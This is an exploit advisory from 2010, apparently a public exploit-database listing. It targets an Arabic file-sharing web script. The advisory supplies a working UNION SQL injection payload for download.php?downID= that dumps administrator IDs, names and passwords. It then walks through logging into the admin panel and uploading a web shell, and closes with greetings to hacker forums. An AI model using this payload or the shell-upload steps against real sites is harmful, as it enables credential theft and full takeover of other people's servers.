Script Upload Up Your Shell (Sql Inject)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Script Upload Up Your Shell (Sql Inject)
# Published : 2010-05-27
# Author : MouDy-Dz
# Previous Title : PPhlogger <== 2.2.5 (trace.php) Remote Command Execution Vulnerability
# Next Title : parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities

# ----------------------oOO---(_)---OOo-----------------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ / / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/__/__,_/_/ /_.___/__,_/__, /____/ |
# |MouDy-Dz /____/ 2o1o |
# ------------------------------------------------------------
Upload Shell
# ------------------------------------------------------------
--------------------------------------------------------------
File Share <== all version (download.php?downID=)
arabic Script
--------------------------------------------------------------
#[+] Author : MouDy-Dz #
# [+] Email : MouDy-Dz@HoTMaiL.coM #
# [+] 27-5-2010 #
# [+] Cobra Team #
# [+] Script : Upload ?File share#
# All Version #

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=

Exploit : scriptFile sharedownload.php?downID=

http://localhost/scriptFile sharedownload.php?downID=[Sql Inject]

http://127.0.0.1/scriptFile sharedownload.php?downID=[Sql Inject]


[Sql Inject] = -4+union+select+1,concat%28id,0x3a,nom,0x3a,pass%29,3,4,5,6,7,8,9,10+from+mombre

Exemple = http://localhost/scriptFile sharedownload.php?downID=-4+union+select+1,concat%28id,0x3a,nom,0x3a,pass%29,3,4,5,6,7,8,9,10+from+mombre

you can use another Number in (-4) *_^

After
http://localhost/scriptFile sharedownload.php?downID=-4+union+select+1,concat%28id,0x3a,nom,0x3a,pass%29,3,4,5,6,7,8,9,10+from+mombre

You show The Admin and The password

Login =====> admincp/login.php

exemple = http://localhost/scriptFile shareadmincp/login.php

after login add .php

and go to home of script and upload your shell

web site Favorites my Of Exploit ^_^ : JusT=====> http://www.exploit-db.com

================== Greetz : all my friend ===================
* Sn!per-dz * * &#1576;&#1581;&#1585;&&#1575;&#1604;&#1581;&#1576; * KONDAMNE * AntiSystem * Antitracker |
&#1608; &#1575;&#1604;&#1609; &#1580;&#1605;&#1610;&#1593; &#1575;&#1593;&#1590;&#1575;&#1569; &#1601;&#1585;&#1610;&#1602; &#1603;&#1608;&#1576;&#1585;&#1575;
================== Greetz : My Best Forum ===================
* www.3asfh.com / www.Dev-point.com /www.h4ckforu.com /www.sa3eka.com